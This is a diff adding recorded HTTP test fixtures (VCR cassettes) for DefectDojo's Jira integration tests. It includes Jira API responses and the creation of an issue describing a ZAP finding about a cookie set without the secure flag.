Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 88a00194-2abe-4f7a-9cdb-2aba14202e63 + x-envoy-upstream-service-time: + - '68' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/latest/issue/NTEST-463 + response: + body: + string: !!binary | + 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 + headers: + ATL-TraceId: + - f4805b423500f289 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:25 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - ecfed33a-f686-4a1f-991e-7e1536870394 + x-envoy-upstream-service-time: + - '177' + status: + code: 200 + message: OK +version: 1 diff --git a/unittests/vcr/jira/JIRAConfigAndPushTestApi.test_engagement_epic_mapping_enabled_no_epic_and_push_findings.yaml b/unittests/vcr/jira/JIRAConfigAndPushTestApi.test_engagement_epic_mapping_enabled_no_epic_and_push_findings.yaml new file mode 100644 index 00000000000..8d4c32afe41 --- /dev/null +++ b/unittests/vcr/jira/JIRAConfigAndPushTestApi.test_engagement_epic_mapping_enabled_no_epic_and_push_findings.yaml @@ -0,0 +1,1654 @@ +interactions: +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/serverInfo + response: + body: + string: !!binary | + H4sIAAAAAAAAA0yPQUvEMBCF/0uuttlJNm23uYkeVGQV2j2JSNpOsJImpUmFZdn/boKL623em+/N + Y06kUx4PiyGSfIYwe7nZDKixD4P7clQFo7wflaUWA8nINy5+dDbCDIBRoJA3+9vX5uGlvW7369TF + ici3BGWQwXtGBpyNO05oQ3ucMR64M24dYqhbRzP8RohMgUJczHsVEsiBsxx4zsuWMckruRUUAG4g + wjHvcYm97Thd2W0OrOUgRSF5Sfmu+mP76dFqF0FRFkWlmdaIYlfXWomkUbGKl8WOR8GLvi7rfwXB + pIancVEkvaPVasKz61WyT8RcJoL249CQ8/kHAAD//wMAxW9qC1oBAAA= + headers: + ATL-TraceId: + - 2fdb2ff1118aef46 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:26 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - a9e11891-cfe2-4de8-a6b4-14643207b516 + x-envoy-upstream-service-time: + - '30' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - f74ed2f5912112aa + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:26 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - d1acdb52-10fb-466e-b6b6-4015038af115 + x-envoy-upstream-service-time: + - '49' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/createmeta?projectKeys=NTEST&issuetypeNames=Task&expand=projects.issuetypes.fields + response: + body: + string: !!binary | + H4sIAAAAAAAAA+xWS0/jMBD+K1EOnCpCS8WiShVCy66EdoWQKFwQB5NMqKljBz/adBH/fT2JE7vQ + ZbPlsgd6qWcyj28envFzDFVJeBZP4lKKR0i1igf+OLl99gJUKQN6XQKKKGC55c21LtUkSTLIrUIm + HsU+0YwoRQnf56ATCUonpKTJKHFWk+GB/VkTFI22xALWlrqYfbuaWYqTAix5zanW1gA6JEuiibyW + zKJ6jsfH1fi4j38FqZHQ+m6MnJQ0m9aO9xrGOZLjgy/WzWhcjcY7G1b0F0xVQRjbU+7/HV/Do2p4 + 9DFfVevMHd7xdjiqDkcf81ZARk1hvbnDH729DMJuwS7aoV86C3XHjMKOQSIDlUpaaiq45Z5GdQIG + UUaVpjzVUUkhhUjk0UrIxT5qp4Lb/umDwqVgSWG1Jf4g2MPhsSNnFui0g+x7eEbUwlKGa0m4YkRD + drHxRZl7jadJTpiCgb9vOQWWYeu7g217ZYqCyDUeJTwZKsEKammsmkrnUBD8UvufxEpLyh/QwVpp + KJDjtF86cFeO096/VmIQz4k6g5wYpm8IM9ChEyVIgjnHstqq6vguLHYvZGGWOnCe6eGdIy/CzHYI + Q91eGO/s6GBMrCCrhT67cVvPtTbiSW3kBWuaiqIUHDiugbCoTuVNVYmUBDuH2npaFa8fVjkw6sv8 + 1TPbMgdyPesckyxDT4D+JBRiCfGW2mNkRGuSzguEtlNkgX4QWsD1oZ2Gok1oG9q9QkPMG/3VB/Tb + 6x+a8AjPAm4LMZTsibEbBW5t9BoErWwAsmV5gJedUAPOK/0DsLeNsNMQ+NgTxmnj3fzRjFuR6xWR + 9RykRcmonfS+pJ8vnm2+/tcXTz0z64nLKF/sODMD/derseH6a/HT0pBF9Yr0c3PDADFa4GxloKHn + qnm98JKSpguQJzY/0k4sdxdt1HtqLlZX5h4XyiXBb1O85CFbNRynWgO1bT/lxlbtyYBcT3vfYZzt + mN+cVjcgVcPeJcHLRjvMbmjTp/c7rSIn7LMbivaF3iykZjn9ZS3ZMjxwgH6RGQUyDKPTDpZPy+pW + j2ds9sZvAAAA//+8l81uwjAMx19l6p1kHeUyaeI0aQf2CGgKKEoyAUVNGezQd5+dL1rSTe1ScXUT + +5fG8d8emxsYnFpvbLPj8IBYtZVL94BeTA0ce8dXAVFlpeqbJve33xBWdzTE2doiEpZ5FQmGCM+q + VQ9dfG//VBEbm+aYmcP7QLVngmuKO7R3osAglZDgnegv1Ht34jdrxAhGpOBnpMGalnca2JjUYz4l + Y86nwbT1vgv6bmwedZ6MWkyDChnZ5VyVZw9ZJEMuJoOMUnRlbB51kTVr7HPbLzEN/Z6pAKVme9J1 + uTfD+gf0CHkxrIKxAxYhuzkzkw85fl+UJqLi/CDLI9Qh8qkq9izkjIMez1DfwxY7tEG0a7F7hUUP + 2B9kYZyK0HrK3p9Vecc23DaiA050I7rxKOK8tboZa/C87nuaTOXkkVpHVJ8EXG29HClJfSNlg53e + uvkBAAD//wMAc91BljkVAAA= + headers: + ATL-TraceId: + - b9aab1b3e80f7b07 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:26 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - cc372ef1-e852-4d0c-8e9d-3fd1f899a829 + x-envoy-upstream-service-time: + - '112' + status: + code: 200 + message: OK +- request: + body: '{"fields": {"project": {"key": "NTEST"}, "summary": "Zap1: Cookie Without + Secure Flag", "description": "\n\n\n\n\n\n*Title*: [Zap1: Cookie Without Secure + Flag|http://localhost:8080/finding/391]\n\n*Defect Dojo link:* http://localhost:8080/finding/391\n\n*Severity:* + Low \n\n*CWE:* Unknown\n\n\n\n*CVE:* Unknown\n\n\n*Product/Engagement/Test:* + [Security How-to|http://localhost:8080/product/2] / [weekly engagement|http://localhost:8080/engagement/3] + / [ZAP Scan|http://localhost:8080/test/114]\n\n*Branch/Tag:* None\n\n*BuildID:* + None\n\n*Commit hash:* None\n\n*Systems/Endpoints*: \n\n* https://mainsite.com:443\n* + https://mainsite.com\n* https://mainsite.com/dashboard\n\n*Description*:\nA + cookie has been set without the secure flag, which means that the cookie can + be accessed via unencrypted connections.\n\nReference: http://www.owasp.org/index.php/Testing_for_cookies_attributes_(OWASP-SM-002)\n\nURL: + https://mainsite.com/dashboard\nMethod: GET\nParameter: opvc\nEvidence: Set-Cookie: + opvc\n\nURL: https://mainsite.com/dashboard\nMethod: GET\nParameter: dmid\nEvidence: + Set-Cookie: dmid\n\nURL: https://mainsite.com\nMethod: GET\nParameter: sitevisitscookie\nEvidence: + Set-Cookie: sitevisitscookie\n\n\n*Mitigation*:\nWhenever a cookie contains + sensitive information or is a session token, then it should always be passed + using an encrypted channel. Ensure that the secure flag is set for cookies containing + such sensitive information.\n\n*Impact*:\nNo impact provided\n\n*Steps to reproduce*:\nNone\n\n*References*:\nCWE-614\nWASC-13\n\n\n*Defect + Dojo ID:* 391\n\n*Reporter:* [(admin) ()|mailto:]\n", "issuetype": {"name": + "Task"}, "priority": {"name": "Low"}}}' + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Length: + - '1673' + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: POST + uri: https://defectdojo.atlassian.net/rest/api/2/issue + response: + body: + string: '{"id":"10617","key":"NTEST-465","self":"https://defectdojo.atlassian.net/rest/api/2/issue/10617"}' + headers: + ATL-TraceId: + - b534b03332717b40 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:27 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - fdfde70d-ac81-4ec1-8ac3-fcb4bbe3c716 + x-envoy-upstream-service-time: + - '360' + status: + code: 201 + message: Created +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/NTEST-465 + response: + body: + string: !!binary | + H4sIAAAAAAAAA6RWbVPbOBD+Kxp/6NxxSfySlAbPdG5oSHvcUcokAWYKnYxibxw1tuSR5Dg5yn+/ + lWUTCoRrafiAtdK+P/tINw6sc8pjJ3Qk8BgkxO8ZpLFqcZqBaqloARltiRwk1Uxw1YKY6Qw0bUUL + yhNIRdJagVS4B/EIcgkKuLZnnZbDjGXf2/ff4EJBOsflQutcha4bwxwiHYuvokN1SpVilHc4aBdt + aJfmzA1cplQBbmNgCRvUP50Mx5N2b/81SuZVsE544yh0WqiIakiE3NjgYlyhQuAFftvrtj1/Enhh + 73UY7HcODrp/eL7nmRiND73JoTLzwhiNPsbpecE2a7uIQUWS5aYiKD0kKqNp2iIxU5rxSJOcQQRE + zEkp5LJjtCPBz2X6I1EoiAoJ7opBSVdUU/mnYv/C2wybVGSvrOg4fut7Xb9fLycY6Nttyi3HNBp9 + Tahamh4VM22+wjlNFbScxoYTVkZuW45mCIwcm+yEvMBMnFyKrxjeC6tXa1e1q7rR1M4s7jV8G+k5 + Z1qjAYOvWtsk9U91Vom5Lqk0iSmW5SlDhMQPssHiVpDp9de9/o+EW5e5dlZXOmemsPi7X+eeZ3Aa + 9NZB78WGqxZWKHml6v/P+PL31/7+r/laN87qj2e8dYN1N/g1bzU4VfOx09vtrZnv9YVlF+zY1Rfs + YJJISHCuH8EQMSXSwo6ZlUSF0iKrKGKKHoI3uzb6j21Y6rBSM5gV/Tlh2285mKa+wIkzuKoPUI08 + aWno5yfActwdq7nWmjTwrj4HojBZ+oapLo2A8cQJtSzgtiYvY0yyyOZ+80hmAsOjaiGKND5iKk/p + ph4JFEcSMFczdU/x5Jue3/Dkw6p5u8rp79oItpTBhGR688KKNepu7+fokmU0AeUaDdUYYShIRdlR + q2RLMSeibKio55gaPUik2ySS0hkYMjHQfHDITOWTZfB34dDvm3osqBrmLDphfFldxUeQm5uZR03P + qk6W1d6dhAs+xIuZzlIYAVUWB7L+cs5Ozj8cn05PjgfD0/FwOhyNPo0wPxwghQXBA5MFkDNkTa6J + 8UuYIoKnG4ITyVJjlGhB/maSkjMJGU4tKRQitFPN6MMsDtCg9415Xpfy0LEXBvYOi78dqe/GGNuQ + ME7Th4fqd0Vd3grVKUbXMAH2NeFwd7rIzcz+AI7tS+GF0LPKd7fV95f7z6FxC7d3NFriQ6qBXGPc + +hrUT5pfCrh5F7nN8yRoLlcOBuqRSIU8tdHM0gLaiUSO2D4OBDkSttkiy/Gpx3Xdhef6931xrvn2 + b2/CdAp7Ibn6THM/JAMhlgzIJdPIUZqMq8uDvE9p8s3kiqmmIqLpQigd9r2+584Zj5EG3e6B/6Uy + eFSVAqP8KogBSbhH/lezUhwDwgy5BBVw6kklG1wOcXnOl1yU25gHF4+ke2dSxAW+XoY8wUnKsC7u + BMuA566qJNAw+UuUbS12JJLXBoIvxCVXJcASxw7urO3Q2h5wu5Xi58MzMo4o33HePJdc3+/ZWr2T + lEcLd0ITjPMUu2mlBUvj46P7ooHIMqYJMtLivni8URoyhUnHuWAIBWwk/qq9quoGmxllXDENHURM + 2Ot1d+3tkrsxep0JKuO6v3dY2guv+SGJLGQwNjID4ESBJmWNH410Zh8gZI4YapFywaIFyYByhZvU + nqgtYNXQAqFRhHQIMVkxSgpEeCQ3OfIJHuMc7D3aMaGMEGnIlBGEDcLKsuyIkqq8I2TiIr5g3ckX + eYUEhNp0LuTUOlNTqvFWnhXYkOlvny4Px2ft8cc23ii/G9PnoxNr9LlifARMMg7Jh+HkmiNp44Rq + 